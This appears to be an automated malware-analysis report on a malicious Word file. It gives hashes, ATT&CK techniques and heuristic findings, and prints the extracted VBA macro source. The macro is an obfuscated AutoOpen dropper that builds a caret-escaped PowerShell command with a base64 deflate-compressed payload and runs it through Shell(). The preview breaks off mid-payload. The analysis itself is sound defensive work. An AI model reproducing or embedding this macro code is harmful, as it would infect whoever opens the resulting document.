Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a4e68284c8e2361a…

MALICIOUS

Office (OLE)

Size: 87.2 KB
Created: 2018-06-06 20:25:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: c98fa51bca62be146a692eb1d92170b5
SHA-1: 4cde731dd4f848f6074a910963506128da7db23b
SHA-256: a4e68284c8e2361ac3dbf7705a1be750ed7d5878c0da9c23258ea832601c664c
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The critical OLE_VBA_SHELL heuristic indicates the presence of a Shell() call within the VBA macros. The Autoopen macro, identified by OLE_VBA_AUTOOPEN and OLE_VBA_PCODE_AUTOEXEC_EXEC, is designed to execute this Shell() call upon opening the document. The script attempts to construct and execute a command line, likely involving PowerShell, to download and run a secondary payload. The embedded URL is benign, but the macro's intent is clear.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9783 bytes
SHA-256: 9d90a2930ff2bab8c19d30928c0d7cfc25380fe3d5aa06ca4e390f0ef5f5504b

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "HbSNSiqf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function chdIwczf()
On Error Resume Next
AUKdi = (XfEAz / ciHRnw / 47740 + Oct(azJfXz)) + YdpPUE - CLng(11847)
WXsfAJ = PYNjD
wlurz = 4677
BLiGib = (BOlcWW / kuuSYc / 34428 + Oct(kRrvBb)) + uXUCYw - CLng(21236)
mAZKHA = lJjpLr
YbaPQ = 51367
chdIwczf = pqCWwHkhP + Shell(iHnfHVqIFJ + Chr(jtVVpDdq + vbKeyC + PjjPLqbDAcL) + viEPrCzSYY + FLzhF + Lowja + CsvXErWJuWE + zOWNIKkOt + HNkpmzP, 77415 - 77415)
OiZXI = (NIUwk / BHSwS / 20162 + Oct(wjiPMP)) + uztcI - CLng(64694)
iYRzmw = YdoiEm
tGcIFj = 55013
End Function
Sub Autoopen()
On Error Resume Next
jTNHHZ = (OspDp / jBwfL / 5830 + Oct(DuhHd)) + AsQUD - CLng(1459)
zszmi = HKOvsB
SKFict = 57417
chdIwczf
immFi = (YVwYmC / ZrDMAU / 91764 + Oct(owoFj)) + qnmrJW - CLng(8181)
FLjAv = oPXGzP
TBRcZi = 78008
End Sub


Attribute VB_Name = "nzAzChiMjcfdG"
Function viEPrCzSYY()
On Error Resume Next
TwjKs = (wsznFc / iJMwjd / 58914 + Oct(ScFsS)) + JLzHi - CLng(35106)
iTIwza = tjjtkC
vGqdUz = 19909
kYdOwHiiiz = "md NXI" + "jkLXr" + "swi" + "QM IWToA" + "pIjJJltuBBc" + "t IdAsZzkadG &" + "     %" + "^c^o" + "^m^S^p^" + "E^c^% "
WiSah = (jAfXKK / pDAmDj / 15370 + Oct(sLHQSO)) + IiNUQ - CLng(58639)
ijWtIN = EVZrtF
qrROC = 26578
KvIYEXhk = "    %^" + "c^o^m^S^p^E^c^" + "%   " + "  /" + "V         /c  " + "   " + "      s" + "et %UOFbZPPR" + "OsqkhOw%=wSdpq"
SKKOYb = (AKptVs / TPJau / 12521 + Oct(phYZJC)) + nwGOQ - CLng(38117)
VMikl = DLjzXM
WbHoHH = 78615
hqAklsTc = "UluDlH&&set %bs" + "QwAMWk%=p&&s" + "et %tGa" + "KwYKYAank%=o" + "^w&&set %dto" + "PPfZozDKTilk" + "%=AfYw" + "mwzAR&&set %VPY"
clpOZZ = (NjfEY / wCfpI / 34897 + Oct(dzaBwY)) + LoRGJi - CLng(68476)
bpWMOp = zSToRY
cwwpD = 97752
GBnSK = "spnwisJ" + "oB%=!%b" + "sQwAMWk%!&&se" + "t %znQzdLX"
LnSAiB = (SYvtc / bpTwD / 90834 + Oct(zHiIHX)) + MSIUbk - CLng(26200)
BEMko = huXuo
zmfCl = 16379
HiLZpXQzEWE = "nI" + "mXZcbE%=ZwXow" + "wEF&&s" + "et %wPrZsw" + "B%=e^r"
viEPrCzSYY = kYdOwHiiiz + KvIYEXhk + hqAklsTc + GBnSK + HiLZpXQzEWE
End Function
Function FLzhF()
On Error Resume Next
hDFJt = (OMzQb / ssKoP / 69345 + Oct(HHQNK)) + SEpZn - CLng(11195)
SRjNwu = dZLii
bwamwQ = 35344
dJcmJpHkmN = "&&set %DJO" + "aoSWszOOIt" + "p%=!%tGaKwYK" + "YAa" + "nk%!&&set %dh" + "iVLZjjr%=s&&s" + "et %GkOfoVjunz" + "SsJpU%=mf" + "WzN" + "oYETpNwc&&set"
BLQpu = (aCZnMK / zaLzrU / 33311 + Oct(ivijOl)) + iCbXn - CLng(29660)
GPXCw = azYWUD
WOoGvB = 56586
EzVRKNVsP = " %mpBnBQlZ" + "bJ" + "SP%=he&" + "&set" + " %ZcWwAF" + "aUY%=ll&&!"
QiGfJ = (YXMoW / iTvapW / 48882 + Oct(iWMPL)) + APNUc - CLng(73818)
zqhRWo = BcMhzZ
CTORYb = 27723
uuBGNCTQIi = "%VPYspnwis" + "JoB%!!%D" + "JOaoSWszOOI" + "tp%!!%wPrZswB%"
tWrUzE = (JrMkr / dOJShm / 25031 + Oct(KiSlQ)) + wzDDKX - CLng(25539)
LaCois = UUMiI
EFwqp = 2699
fhIORIjdaH = "!!%dhiVL" + "Zjjr%!" + "!%mpBnBQlZb" + "JSP%!!" + "%ZcWwAFaUY%!  " + "-e KAAgAE4AZQB3"
FLzhF = dJcmJpHkmN + EzVRKNVsP + uuBGNCTQIi + fhIORIjdaH
End Function
Function Lowja()
On Error Resume Next
jrZijG = (KoJZT / hDjQs / 6428 + Oct(npKFC)) + ZruEM - CLng(40806)
jNTAT = bjIjK
OlrBVh = 96070
zOvFdZKA = "AC0ATwBCAGoA" + "ZQBjAFQAI" + "AAgAHMAWQBTA" + "FQARQB" + "NA"
hqujTj = (hVQkwE / oUjizn / 52635 + Oct(fIzSoV)) + pYWOjo - CLng(85510)
mhndu = swNiQ
XSnkKK = 87476
imdifNiz = "C4AaQBvAC4AYwB" + "vAG0AcAB" + "yAGUAUwBz" + "AEkAbwBO" + "AC4ARABFAEYAb"
lhBrF = (frNiV / vBwBJ / 19297 + Oct(cmMljX)) + KXklE - CLng(46561)
hhFfvX = fAifNI
VVmaA = 57183
UnAvYG = "ABBAFQAZQBzAHQA" + "cgBlAGEATQAo" + "ACAA" + "WwBpAG8ALgBNAE" + "UATQBPAFI" + "AWQBz" + "AFQAUgBlAG" + "EAbQBdAFsAcwB5" + "AHMAdABlAG0" + "ALgBjAG8ATgB2AE"
YYvSU = (pIHbiz / OUqWO / 73799 + Oct(zliGWP)) + oBwLD - CLng(89377)
IIKMaq = XtHBQ
mBfQMN = 82528
QRHpRm = "UAcgB0AF0AOgA6A" + "EYAc" + "gBPAE0" + "AY" + "gBBAFMAZ" + "QA2ADQA" + "UwB0AHIAa
... (truncated)